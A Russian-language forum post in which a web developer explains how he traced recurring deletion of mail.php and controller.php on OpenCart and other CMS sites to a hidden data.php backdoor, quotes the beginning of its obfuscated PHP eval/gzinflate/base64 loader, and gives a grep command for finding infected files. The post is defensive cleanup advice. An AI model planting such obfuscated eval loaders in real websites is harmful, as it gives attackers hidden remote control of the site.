streetr

Докопался: удаление файлов mail.php и controller.php

Рекомендуемые сообщения

streetr    0

Всем привет, последнее время часто заказывают исправление проблемы с удалением файла mail.php и иногда controller.php, Чаще всего обращаются по сайтам на opencart (может потому что основная специальность у меня по нему) но и wordpress, joomla так же страдают такой траблой. Естественно вирус, естественно чистим, но все равно файлы пропадают через некоторое время. Ну начал я наблюдать активно за одним из таких сайтов, и нашел все таки в логах обращение с POST запросом к файлу data.php (почему то не один из антивиров типа айболита не подозревал этот код) (полный путь писать смысла нету, у всех лежит в разных папках) и картинка с именем data.jpg (не у всех клиентов был такой, а у некоторых имя другое, ищем в содержании файла по слову описанному ниже)

содержание файла примерно такое 

 

<?php $YLbgPfj524 = "vh46afl7tm2ik*n3pws.bu;0j)(qo_erzxy51dg9c8/";$oDJXw7301 = $YLbgPfj524[16].$YLbgPfj524[31].$YLbgPfj524[30].$YLbgPfj524[38].$YLbgPfj524[29].$YLbgPfj524[31].$YLbgPfj524[30].$YLbgPfj524[16].$YLbgPfj524[6].$YLbgPfj524[4].$YLbgPfj524[40].$YLbgPfj524[30];$Gcwa9593 = "".chr(101)."\x76".chr(97)."".chr(108)."".chr(40)."g\x7Ai\x6E".chr(102)."".chr(108)."a".chr(116)."".chr(101)."".chr(40)."ba".chr(115)."e".chr(54).

После поиска по всем файлам на сайте по слову YLbgPfj524  ( grep -rl 'YLbgPfj524' /PATH_TO_SITE/ ) вычистил весь подобный хлам, и УРА все тихо. Вирус однотипный, так как содержание файла data.php у всех одинаковое, клиенты часть новые, от меня заражения быть у них не могло, проблемы, код вируса и имена файлов у всех одинаковы.

P>S написать решил имеено сюда,  как так когда искал инфу по проблеме, находил топики

http://searchengines.guru/showthread.php?t=914314

И такой каталог был на сервере, только в корне

https://opencartforum.com/topic/52058-наверное-взломали/

Изменено пользователем streetr

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти


  • Похожий контент

    • От ananas999
      Здравствуйте, в логах ошибка связанная с почтой. Возможно некоторые форматы почты не поддерживаются, не знаю... Вроде регистрация и отправка писем работает, но: 
       
       
      PHP Notice:  Error: DATA not accepted from server! in /home/users/1/user3/domains/site.ru/system/library/mail.php on line 418
       
      Указывает на этот отрезок:
       
                   if (substr($reply, 0, 3) != 250) { 418       trigger_error('Error: DATA not accepted from server!');              exit();              }   У меня OcStore 2.0.1.1  
       
      Как решить, что изменить или поправить?
  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу